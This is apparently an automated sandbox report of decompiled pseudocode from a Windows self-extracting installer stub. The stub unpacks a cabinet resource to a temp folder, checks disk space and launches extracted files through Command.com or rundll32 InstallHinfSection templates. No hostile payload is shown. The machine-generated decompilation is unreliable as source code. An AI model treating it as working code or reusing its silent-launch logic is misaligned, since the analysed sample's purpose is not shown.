                  				void* _t143;
                  				intOrPtr* _t144;
                  				char* _t146;
                  				CHAR* _t149;
                  				void* _t150;
                  				CHAR* _t153;
                  				CHAR* _t154;
                  				void* _t155;
                  				signed int _t156;
                  
                  				_t48 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t48 ^ _t156;
                  				_t108 = __ecx;
                  				_v1560 = _a4;
                  				_v1564 = _a8;
                  				E00F31485( &_v528, 0x104, __ecx);
                  				_t111 =  &_v1556;
                  				if(_v528 != 0x22) {
                  					_t53 =  &_v528;
                  					_t133 = " ";
                  				} else {
                  					_t53 =  &_v527;
                  					_t133 = "\"";
                  				}
                  				_v1556 = _t53;
                  				_t54 = E00F318A7(_t111, _t133);
                  				_t154 = _v1556;
                  				_t149 = _t54;
                  				if(_t154 == 0) {
                  					L12:
                  					_push(_t111);
                  					E00F3158C( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                  					E00F364E7( &_v268, 0x104, _t154);
                  					goto L13;
                  				} else {
                  					_t130 = _t154;
                  					_t146 =  &(_t130[1]);
                  					do {
                  						_t105 =  *_t130;
                  						_t130 =  &(_t130[1]);
                  					} while (_t105 != 0);
                  					_t111 = _t130 - _t146;
                  					if(_t111 < 3) {
                  						goto L12;
                  					}
                  					_t106 = _t154[1];
                  					if(_t106 != 0x3a || _t154[2] != 0x5c) {
                  						if( *_t154 != 0x5c || _t106 != 0x5c) {
                  							goto L12;
                  						} else {
                  							goto L11;
                  						}
                  					} else {
                  						L11:
                  						E00F31485( &_v268, 0x104, _t154);
                  						L13:
                  						_t136 = 0x2e;
                  						_t57 = E00F365AF(_t154, _t136);
                  						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                  							_t137 = 0x2e;
                  							_t115 = _t154;
                  							_t58 = E00F365AF(_t115, _t137);
                  							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                  								_t154 = LocalAlloc(0x40, 0x400);
                  								if(_t154 == 0) {
                  									goto L22;
                  								}
                  								_t65 = GetFileAttributesA( &_v268); // executed
                  								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                  									_t119 =  &_v1552;
                  									E00F31485( &_v1552, 0x400, _t108);
                  								} else {
                  									_push(_t115);
                  									_t108 = 0x400;
                  									_t119 =  &_v1552;
                  									E00F3158C( &_v1552, 0x400, _t115,  &_v268);
                  									if(_t149 != 0 &&  *_t149 != 0) {
                  										E00F314BD( &_v1552, 0x400, _t149, " ");
                  										_t119 =  &_v1552;
                  										E00F314BD( &_v1552, 0x400, _t149, _t149);
                  									}
                  								}
                  								_t138 = _t154;
                  								E00F32922( &_v1552, _t154, _t119);
                  							} else {
                  								_t108 = "Command.com /c %s";
                  								_t123 = "Command.com /c %s";
                  								_t143 = _t123 + 1;
                  								do {
                  									_t76 =  *_t123;
                  									_t123 = _t123 + 1;
                  								} while (_t76 != 0);
                  								_t124 = _t123 - _t143;
                  								_t144 =  &_v268;
                  								_t155 = _t144 + 1;
                  								do {
                  									_t77 =  *_t144;
                  									_t144 = _t144 + 1;
                  								} while (_t77 != 0);
                  								_t138 = _t144 - _t155;
                  								_t152 = _t124 + 8 + _t144 - _t155;
                  								_t154 = LocalAlloc(0x40, _t124 + 8 + _t144 - _t155);
                  								if(_t154 == 0) {
                  									goto L22;
                  								}
                  								E00F31524(_t154, _t152, "Command.com /c %s",  &_v268);
                  							}
                  							goto L53;
                  						} else {
                  							_t85 = GetFileAttributesA( &_v268);
                  							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                  								_t138 = 0x525;
                  								_push(0);
                  								_push(0x10);
                  								_push(0);
                  								_t60 =  &_v268;
                  								goto L36;
                  							} else {
                  								_t138 = "[";
                  								_v1556 = _t149;
                  								_t90 = E00F318A7( &_v1556, "[");
                  								if(_t90 != 0) {
                  									if( *_t90 != 0) {
                  										_v1556 = _t90;
                  									}
                  									_t138 = "]";
                  									E00F318A7( &_v1556, "]");
                  								}
                  								_t154 = LocalAlloc(0x40, 0x200);
                  								if(_t154 != 0) {
                  									_t153 = _v1556;
                  									_t92 = _t153;
                  									if( *_t153 == 0) {
                  										_t92 = "DefaultInstall";
                  									}
                  									 *0xf39a84 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                  									 *_v1564 = 1;
                  									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xf31111, _t154, 8,  &_v268) == 0) {
                  										 *0xf39a74 =  *0xf39a74 & 0xfffffffb;
                  										if( *0xf39a80 != 0) {
                  											_t108 = "setupapi.dll";
                  										} else {
                  											_t108 = "setupx.dll";
                  											GetShortPathNameA( &_v268,  &_v268, 0x104);
                  										}
                  										if( *_t153 == 0) {
                  											_t153 = "DefaultInstall";
                  										}
                  										_push( &_v268);
                  										_push(_t153);
                  										E00F31524(_t154, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                  									} else {
                  										 *0xf39a74 =  *0xf39a74 | 0x00000004;
                  										if( *_t153 == 0) {
                  											_t153 = "DefaultInstall";
                  										}
                  										E00F31485(_t108, 0x104, _t153);
                  										_t138 = 0x200;
                  										E00F31485(_t154, 0x200,  &_v268);
                  									}
                  									L53:
                  									_t62 = 1;
                  									 *_v1560 = _t154;
                  									goto L54;
                  								} else {
                  									L22:
                  									_t60 = 0;
                  									_t138 = 0x4b5;
                  									_push(0);
                  									_push(0x10);
                  									_push(0);
                  									L36:
                  									_push(_t60);
                  									E00F34327(0, _t138);
                  									_t62 = 0;
                  									L54:
                  									_pop(_t150);
                  									return E00F36C20(_t62, _t108, _v8 ^ _t156, _t138, _t150, _t154);
                  								}
                  							}
                  						}
                  					}
                  				}
                  			}















































                  APIs
                  • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00F31A0F
                  • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00F31A24
                  • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00F31A7D
                  • GetPrivateProfileIntA.KERNEL32 ref: 00F31ABA
                  • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00F31111,00000000,00000008,?), ref: 00F31AEA
                  • GetShortPathNameA.KERNEL32 ref: 00F31B4D
                  • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.BAT,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00F31BC1
                  • LocalAlloc.KERNEL32(00000040,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00F31BF8
                  • LocalAlloc.KERNEL32(00000040,00000400,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00F31C26
                  • GetFileAttributesA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00F31C3D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: AllocLocalString$AttributesCompareFilePrivateProfile$NamePathShort
                  • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                  • API String ID: 272226175-3368923722
                  • Opcode ID: 2a4aaca8c32be7386336064a5ee453610579ae464bc673f0a85b4d710a11cacb
                  • Instruction ID: 7393d2a221a5ec85396b52da21ab3e4f95bf49e9f8bcf45aa09208709000f90c
                  • Opcode Fuzzy Hash: 2a4aaca8c32be7386336064a5ee453610579ae464bc673f0a85b4d710a11cacb
                  • Instruction Fuzzy Hash: 1FA12AB1E042186BEF249B24CC45BEA776AFB81330F144294E595E32C1EBB49E85EB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 77%
                  			E00F34E80(void* __edi) {
                  				void* __ebx;
                  				void* _t8;
                  				struct HWND__* _t9;
                  				int _t10;
                  				void* _t12;
                  				struct HWND__* _t24;
                  				struct HWND__* _t27;
                  				intOrPtr _t29;
                  				void* _t33;
                  				int _t34;
                  				CHAR* _t36;
                  				int _t37;
                  				intOrPtr _t46;
                  
                  				_t33 = __edi;
                  				_t36 = "CABINET";
                  				 *0xf39184 = E00F34538(_t36, 0, 0);
                  				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                  				 *0xf39180 = _t8;
                  				if(_t8 == 0) {
                  					return _t8;
                  				}
                  				_t9 =  *0xf385c0; // 0x0
                  				if(_t9 != 0) {
                  					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                  					ShowWindow(GetDlgItem( *0xf385c0, 0x841), 5);
                  				}
                  				_t10 = E00F34DA8(0, 0);
                  				if(_t10 != 0) {
                  					__imp__#20(E00F34BA0, E00F34BC0, E00F34860, E00F34940, E00F349C0, E00F34A60, E00F34AC0, 1, 0xf39188, _t33);
                  					_t34 = _t10;
                  					if(_t34 == 0) {
                  						L8:
                  						_t29 =  *0xf39188; // 0x0
                  						_t24 =  *0xf385c0; // 0x0
                  						E00F34327(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                  						_t37 = 0;
                  						L9:
                  						goto L10;
                  					}
                  					__imp__#22(_t34, "*MEMCAB", 0xf31111, 0, E00F34BE0, 0, 0xf39180); // executed
                  					_t37 = _t10;
                  					if(_t37 == 0) {
                  						goto L9;
                  					}
                  					__imp__#23(_t34); // executed
                  					if(_t10 != 0) {
                  						goto L9;
                  					}
                  					goto L8;
                  				} else {
                  					_t27 =  *0xf385c0; // 0x0
                  					E00F34327(_t27, 0x4ba, 0, 0, 0x10, 0);
                  					_t37 = 0;
                  					L10:
                  					_t12 =  *0xf39180; // 0x0
                  					if(_t12 != 0) {
                  						FreeResource(_t12);
                  						 *0xf39180 = 0;
                  					}
                  					if(_t37 == 0) {
                  						_t46 =  *0xf39218; // 0x0
                  						if(_t46 == 0) {
                  							E00F34327(0, 0x4f8, 0, 0, 0x10, 0);
                  						}
                  					}
                  					if(( *0xf38958 & 0x00000001) == 0 && ( *0xf39a74 & 0x00000001) == 0) {
                  						SendMessageA( *0xf385c0, 0xfa1, _t37, 0);
                  					}
                  					return _t37;
                  				}
                  			}

                  APIs
                    • Part of subcall function 00F34538: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34549
                    • Part of subcall function 00F34538: SizeofResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34552
                  • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00F34E9E
                  • LoadResource.KERNEL32(00000000,00000000), ref: 00F34EA6
                  • LockResource.KERNEL32(00000000), ref: 00F34EAD
                  • GetDlgItem.USER32 ref: 00F34ED0
                  • ShowWindow.USER32(00000000), ref: 00F34ED7
                  • GetDlgItem.USER32 ref: 00F34EEA
                  • ShowWindow.USER32(00000000), ref: 00F34EF1
                  • #20.CABINET(00F34BA0,00F34BC0,Function_00004860,00F34940,00F349C0,Function_00004A60,00F34AC0,00000001,00F39188,00000000), ref: 00F34F47
                  • #22.CABINET(00000000,*MEMCAB,00F31111,00000000,00F34BE0,00000000,00F39180), ref: 00F34F6D
                  • #23.CABINET(00000000), ref: 00F34F7D
                  • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00F34FB1
                  • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00F34FF9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Resource$FindItemShowWindow$FreeLoadLockMessageSendSizeof
                  • String ID: *MEMCAB$CABINET
                  • API String ID: 2850049833-2642027498
                  • Opcode ID: ab3b4be931d01be6acd04378b6deb3c9f2a64cbec1ca46c52f9781a7ebba4b20
                  • Instruction ID: a9406ede7ebc7d6aaa1c4763bb4b2991f9d785a2d45bbbdc42f1b1706575250d
                  • Opcode Fuzzy Hash: ab3b4be931d01be6acd04378b6deb3c9f2a64cbec1ca46c52f9781a7ebba4b20
                  • Instruction Fuzzy Hash: B531B3B1A4430A7BE7106B71EC89F67366EB744B75F080124B941A31A1DBF8FC41BA62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 96%
                  			E00F35849(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                  				signed int _v8;
                  				char _v16;
                  				void _v527;
                  				char _v528;
                  				char _v788;
                  				long _v792;
                  				signed int _v796;
                  				long _v800;
                  				long _v804;
                  				long _v808;
                  				long _v812;
                  				long _v816;
                  				void* __ebx;
                  				void* __esi;
                  				signed int _t50;
                  				int _t54;
                  				signed int _t59;
                  				void* _t70;
                  				signed int _t72;
                  				signed int _t75;
                  				signed short _t80;
                  				signed int _t83;
                  				signed int _t89;
                  				signed int _t103;
                  				long _t104;
                  				unsigned int _t105;
                  				unsigned int _t107;
                  				signed int _t113;
                  				void* _t114;
                  				int _t118;
                  				CHAR* _t119;
                  				signed int _t120;
                  
                  				_t116 = __edi;
                  				_t50 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t50 ^ _t120;
                  				_v796 = __edx;
                  				_t119 = __ecx;
                  				GetCurrentDirectoryA(0x104,  &_v788);
                  				_t54 = SetCurrentDirectoryA(_t119); // executed
                  				if(_t54 != 0) {
                  					_push(__edi);
                  					_v800 = 0;
                  					_v792 = 0;
                  					_v804 = 0;
                  					_v808 = 0;
                  					_t59 = GetDiskFreeSpaceA(0,  &_v800,  &_v792,  &_v804,  &_v808); // executed
                  					__eflags = _t59;
                  					if(_t59 == 0) {
                  						L30:
                  						_v528 = 0;
                  						memset( &_v527, 0, 0x1ff);
                  						 *0xf39a88 = E00F3613C();
                  						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v528, 0x200, 0);
                  						_t112 = 0x4b0;
                  						L31:
                  						__eflags = 0;
                  						E00F34327(0, _t112, _t119,  &_v528, 0x10, 0);
                  						SetCurrentDirectoryA( &_v788);
                  						L32:
                  						_t70 = 0;
                  						__eflags = 0;
                  						L33:
                  						_pop(_t116);
                  						goto L34;
                  					}
                  					_t118 = _v792 * _v800;
                  					_t72 = MulDiv(_t118, _v804, 0x400);
                  					_v792 = _t72;
                  					__eflags = _t72;
                  					if(_t72 == 0) {
                  						goto L30;
                  					}
                  					_t75 = GetVolumeInformationA(0, 0, 0, 0,  &_v816,  &_v812, 0, 0); // executed
                  					__eflags = _t75;
                  					if(_t75 != 0) {
                  						SetCurrentDirectoryA( &_v788); // executed
                  						_t103 =  &_v16;
                  						_t113 = 6;
                  						_t119 = _t119 - _t103;
                  						__eflags = _t119;
                  						while(1) {
                  							_t23 = _t113 - 4; // 0x2
                  							__eflags = _t23;
                  							if(_t23 == 0) {
                  								break;
                  							}
                  							_t89 = _t119[_t103];
                  							__eflags = _t89;
                  							if(_t89 == 0) {
                  								break;
                  							}
                  							 *_t103 = _t89;
                  							_t103 = _t103 + 1;
                  							_t113 = _t113 - 1;
                  							__eflags = _t113;
                  							if(_t113 != 0) {
                  								continue;
                  							}
                  							break;
                  						}
                  						__eflags = _t113;
                  						if(_t113 == 0) {
                  							_t103 = _t103 - 1;
                  							__eflags = _t103;
                  						}
                  						 *_t103 = 0;
                  						_t80 = 0;
                  						_t104 = 0x200;
                  						_t114 = 8;
                  						while(1) {
                  							__eflags = _t118 - _t104;
                  							if(_t118 == _t104) {
                  								break;
                  							}
                  							_t104 = _t104 + _t104;
                  							_t80 = _t80 + 1;
                  							__eflags = _t80 - _t114;
                  							if(_t80 < _t114) {
                  								continue;
                  							}
                  							break;
                  						}
                  						__eflags = _t80 - _t114;
                  						if(_t80 != _t114) {
                  							__eflags =  *0xf39a74 & 0x00000008;
                  							if(( *0xf39a74 & 0x00000008) == 0) {
                  								L20:
                  								_t105 =  *0xf39a78; // 0x0
                  								_t112 =  *((intOrPtr*)(0xf38900 + (_t80 & 0x0000ffff) * 4));
                  								L21:
                  								_t83 = _v796 & 0x00000001;
                  								__eflags = _t83;
                  								if(_t83 == 0) {
                  									L24:
                  									__eflags = _t83;
                  									if(_t83 == 0) {
                  										__eflags = _t105 - _v792;
                  									} else {
                  										__eflags = _t112 - _v792;
                  									}
                  									L27:
                  									if(__eflags <= 0) {
                  										 *0xf39a88 = 0;
                  										_t70 = 1;
                  									} else {
                  										_t70 = E00F324EE(_a4, _t112, _t105,  &_v16);
                  									}
                  									goto L33;
                  								}
                  								__eflags = _v796 & 0x00000002;
                  								if((_v796 & 0x00000002) == 0) {
                  									goto L24;
                  								}
                  								__eflags = _t105 + _t112 - _v792;
                  								goto L27;
                  							}
                  							__eflags = _v812 & 0x00008000;
                  							if((_v812 & 0x00008000) == 0) {
                  								goto L20;
                  							}
                  							_t107 =  *0xf39a78; // 0x0
                  							_t112 =  *((intOrPtr*)(0xf38900 + (_t80 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xf38900 + (_t80 & 0x0000ffff) * 4));
                  							_t105 = (_t107 >> 2) +  *0xf39a78;
                  							goto L21;
                  						}
                  						_t112 = 0x4c5;
                  						E00F34327(0, 0x4c5, 0, 0, 0x10, 0);
                  						goto L32;
                  					}
                  					_v528 = 0;
                  					memset( &_v527, 0, 0x1ff);
                  					 *0xf39a88 = E00F3613C();
                  					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v528, 0x200, 0);
                  					_t112 = 0x4f9;
                  					goto L31;
                  				} else {
                  					_t112 = 0x4bc;
                  					E00F34327(0, 0x4bc, 0, 0, 0x10, 0);
                  					 *0xf39a88 = E00F3613C();
                  					_t70 = 0;
                  					L34:
                  					return E00F36C20(_t70, 0, _v8 ^ _t120, _t112, _t116, _t119);
                  				}
                  			}

                  APIs
                  • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00F35874
                  • SetCurrentDirectoryA.KERNELBASE(?), ref: 00F3587B
                  • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00F358DF
                  • MulDiv.KERNEL32(?,?,00000400), ref: 00F35906
                  • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00F3592E
                  • memset.MSVCRT ref: 00F3594B
                  • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00F3596B
                  • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00F35978
                  • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00F35ADE
                    • Part of subcall function 00F34327: LoadStringA.USER32 ref: 00F3438D
                    • Part of subcall function 00F34327: MessageBoxA.USER32 ref: 00F343C9
                    • Part of subcall function 00F3613C: GetLastError.KERNEL32(00F35A9A), ref: 00F3613C
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                  • String ID:
                  • API String ID: 4237285672-0
                  • Opcode ID: ec4c8a035aad4f3413fafb5b1bf072dddbf64f0c0985c9c79cacf9dbf3c7ff53
                  • Instruction ID: e7f8f525d7d8eb0fd95943e327f3ba441c856a541ba8b9381d40cb8fba097966
                  • Opcode Fuzzy Hash: ec4c8a035aad4f3413fafb5b1bf072dddbf64f0c0985c9c79cacf9dbf3c7ff53
                  • Instruction Fuzzy Hash: 9571B3B190421CAFEB25DB20DC85FFA77BDEB48720F1041AAF446D2141DA789E81BF61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 81%
                  			E00F32DAE(int __edx) {
                  				signed int _v8;
                  				char _v272;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t8;
                  				signed int _t10;
                  				signed int _t11;
                  				signed int _t13;
                  				signed int _t20;
                  				signed int _t21;
                  				signed int _t24;
                  				signed int _t25;
                  				signed int _t26;
                  				signed int _t29;
                  				signed int _t33;
                  				signed int _t35;
                  				intOrPtr _t39;
                  				struct HINSTANCE__* _t42;
                  				signed int _t44;
                  				int _t45;
                  
                  				_t41 = __edx;
                  				_t8 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t8 ^ _t44;
                  				if( *0xf38958 != 0) {
                  					L6:
                  					_t10 = E00F35009();
                  					__eflags = _t10;
                  					if(_t10 == 0) {
                  						L3:
                  						_t11 = 0;
                  						L30:
                  						return E00F36C20(_t11, _t35, _v8 ^ _t44, _t41, _t42, _t43);
                  					}
                  					_t13 = E00F35467(); // executed
                  					__eflags = _t13;
                  					if(_t13 == 0) {
                  						goto L3;
                  					} else {
                  						_t43 = 0x105;
                  						GetSystemDirectoryA( &_v272, 0x105);
                  						_t41 = 0x105;
                  						_t38 =  &_v272;
                  						E00F364E7( &_v272, 0x105, "advapi32.dll");
                  						_t42 = LoadLibraryA( &_v272);
                  						__eflags = _t42;
                  						if(_t42 != 0) {
                  							_t35 = GetProcAddress(_t42, "DecryptFileA");
                  							__eflags = _t35;
                  							if(_t35 != 0) {
                  								_t43 = _t45;
                  								_t38 = _t35;
                  								 *0xf3a290("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                  								 *_t35(); // executed
                  								__eflags = _t45 - _t45;
                  								if(_t45 != _t45) {
                  									_t38 = 4;
                  									asm("int 0x29");
                  								}
                  							}
                  						}
                  						FreeLibrary(_t42);
                  						__eflags =  *0xf38944;
                  						if( *0xf38944 != 0) {
                  							L15:
                  							_t20 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\"); // executed
                  							__eflags = _t20;
                  							if(_t20 != 0) {
                  								__eflags =  *0xf3894c;
                  								if( *0xf3894c != 0) {
                  									L19:
                  									__eflags =  *0xf38c68 & 0x000000c0;
                  									if(( *0xf38c68 & 0x000000c0) != 0) {
                  										 *0xf39a7c =  *0xf39a7c & 0x00000000;
                  										__eflags =  *0xf39a7c;
                  									} else {
                  										_t39 =  *0xf39a80; // 0x3, executed
                  										_t25 = E00F323CE(_t39); // executed
                  										 *0xf39a7c = _t25;
                  									}
                  									_t21 =  *0xf38944; // 0x0
                  									__eflags = _t21;
                  									if(_t21 != 0) {
                  										L26:
                  										__eflags =  *0xf38958;
                  										if( *0xf38958 == 0) {
                  											__eflags = _t21;
                  											if(_t21 == 0) {
                  												E00F33FC9();
                  											}
                  										}
                  										_t11 = 1;
                  										__eflags = 1;
                  										goto L30;
                  									} else {
                  										__eflags =  *0xf39a70 - _t21; // 0x0
                  										if(__eflags != 0) {
                  											goto L26;
                  										}
                  										_t24 = E00F339F1(); // executed
                  										__eflags = _t24;
                  										if(_t24 == 0) {
                  											goto L3;
                  										}
                  										_t21 =  *0xf38944; // 0x0
                  										goto L26;
                  									}
                  								}
                  								_t26 = E00F33970(_t38, _t42);
                  								__eflags = _t26;
                  								if(_t26 == 0) {
                  									goto L3;
                  								}
                  								goto L19;
                  							}
                  							_t41 = 0x4bc;
                  							E00F34327(0, 0x4bc, _t20, _t20, 0x10, _t20);
                  							 *0xf39a88 = E00F3613C();
                  							goto L3;
                  						}
                  						__eflags =  *0xf39a70;
                  						if( *0xf39a70 != 0) {
                  							goto L15;
                  						}
                  						_t29 = E00F360D0(); // executed
                  						__eflags = _t29;
                  						if(_t29 == 0) {
                  							goto L3;
                  						}
                  						goto L15;
                  					}
                  				}
                  				if( *0xf38944 != 0) {
                  					L5:
                  					_t33 = E00F33884();
                  					__eflags = _t33;
                  					if(_t33 == 0) {
                  						goto L3;
                  					}
                  					goto L6;
                  				}
                  				if(E00F3508F() != 0) {
                  					__eflags =  *0xf38958;
                  					if( *0xf38958 != 0) {
                  						goto L6;
                  					}
                  					goto L5;
                  				}
                  				goto L3;
                  			}

                  APIs
                  • GetSystemDirectoryA.KERNEL32 ref: 00F32E1B
                  • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00F32E3A
                  • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00F32E4C
                  • DecryptFileA.ADVAPI32 ref: 00F32E69
                  • FreeLibrary.KERNEL32(00000000), ref: 00F32E77
                  • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00F32EA1
                    • Part of subcall function 00F3508F: LocalAlloc.KERNEL32(00000040,00000001,00000000,00000000,00000001,00000000,00F32DDE,00000000,00000001,00000000), ref: 00F350AB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                  • API String ID: 2126469477-58291647
                  • Opcode ID: 46b338cec24d543cea77b67c53894ff623b3fb10458dcd281e4ca9f37600e393
                  • Instruction ID: 5e606972b2f1ad827c411d32709f44be594c4b7f7eb17c720a0ed2a9a9c02990
                  • Opcode Fuzzy Hash: 46b338cec24d543cea77b67c53894ff623b3fb10458dcd281e4ca9f37600e393
                  • Instruction Fuzzy Hash: F641B630E013099ADB60AB75DC4677A37A9AB55774F104529E841C2291EFBCCC81FA62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E00F3532F(CHAR* __ecx, void* __edx, char* _a4) {
                  				signed int _v8;
                  				char _v268;
                  				struct _SYSTEM_INFO _v304;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t10;
                  				void* _t13;
                  				intOrPtr _t14;
                  				void* _t16;
                  				void* _t20;
                  				signed int _t26;
                  				void* _t28;
                  				void* _t29;
                  				CHAR* _t48;
                  				signed int _t49;
                  				intOrPtr _t61;
                  
                  				_t10 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t10 ^ _t49;
                  				_push(__ecx);
                  				if(__edx == 0) {
                  					_t48 = 0xf39224;
                  					_t42 = 0x104;
                  					E00F31485(0xf39224, 0x104);
                  					L14:
                  					_t13 = E00F3578F(_t48); // executed
                  					if(_t13 != 0) {
                  						L17:
                  						_t42 = _a4;
                  						if(_a4 == 0) {
                  							L23:
                  							 *0xf39a88 = 0;
                  							_t14 = 1;
                  							L24:
                  							return E00F36C20(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                  						}
                  						_t16 = E00F35849(_t48, _t42, 1, 0); // executed
                  						if(_t16 != 0) {
                  							goto L23;
                  						}
                  						_t61 =  *0xf38940; // 0x0
                  						if(_t61 != 0) {
                  							 *0xf38940 = 0;
                  							RemoveDirectoryA(_t48);
                  						}
                  						L21:
                  						_t14 = 0;
                  						goto L24;
                  					}
                  					if(CreateDirectoryA(_t48, 0) == 0) {
                  						 *0xf39a88 = E00F3613C();
                  						goto L21;
                  					}
                  					 *0xf38940 = 1;
                  					goto L17;
                  				}
                  				_t42 =  &_v268;
                  				_t20 = E00F35253(__ecx,  &_v268); // executed
                  				if(_t20 == 0) {
                  					goto L21;
                  				}
                  				_push(__ecx);
                  				_t48 = 0xf39224;
                  				E00F3158C(0xf39224, 0x104, __ecx,  &_v268);
                  				if(( *0xf39a74 & 0x00000020) == 0) {
                  					L12:
                  					_t42 = 0x104;
                  					E00F364E7(_t48, 0x104, 0xf31111);
                  					goto L14;
                  				}
                  				GetSystemInfo( &_v304);
                  				_t26 = _v304.dwOemId & 0x0000ffff;
                  				if(_t26 == 0) {
                  					_push("i386");
                  					L11:
                  					E00F364E7(_t48, 0x104);
                  					goto L12;
                  				}
                  				_t28 = _t26 - 1;
                  				if(_t28 == 0) {
                  					_push("mips");
                  					goto L11;
                  				}
                  				_t29 = _t28 - 1;
                  				if(_t29 == 0) {
                  					_push("alpha");
                  					goto L11;
                  				}
                  				if(_t29 != 1) {
                  					goto L12;
                  				}
                  				_push("ppc");
                  				goto L11;
                  			}

                  APIs
                  • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00F35391
